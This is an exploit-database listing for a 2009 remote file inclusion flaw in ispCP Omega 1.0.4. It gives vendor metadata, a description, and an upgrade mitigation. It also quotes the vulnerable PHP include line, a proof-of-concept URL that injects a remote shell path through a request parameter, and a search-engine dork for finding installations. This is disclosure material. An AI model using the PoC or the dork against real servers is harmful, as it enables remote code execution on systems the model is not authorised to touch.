ispCP Omega - exploit.company

vendor:

ispCP Omega

by:

cr4wl3r

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: ispCP Omega

Affected Version From: 1.0.4

Affected Version To: 1.0.4

Patch Exists: YES

Related CWE: N/A

CPE: ispcp-omega

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ispCP Omega <= 1.0.4 Remote File Include Vulnerability

A vulnerability exists in ispCP Omega version 1.0.4 which allows an attacker to include a remote file via the 'net2ftp_globals[application_skinsdir]' parameter in the 'admin1.template.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of ispCP Omega.

Source

Exploit-DB raw data:

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]

[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]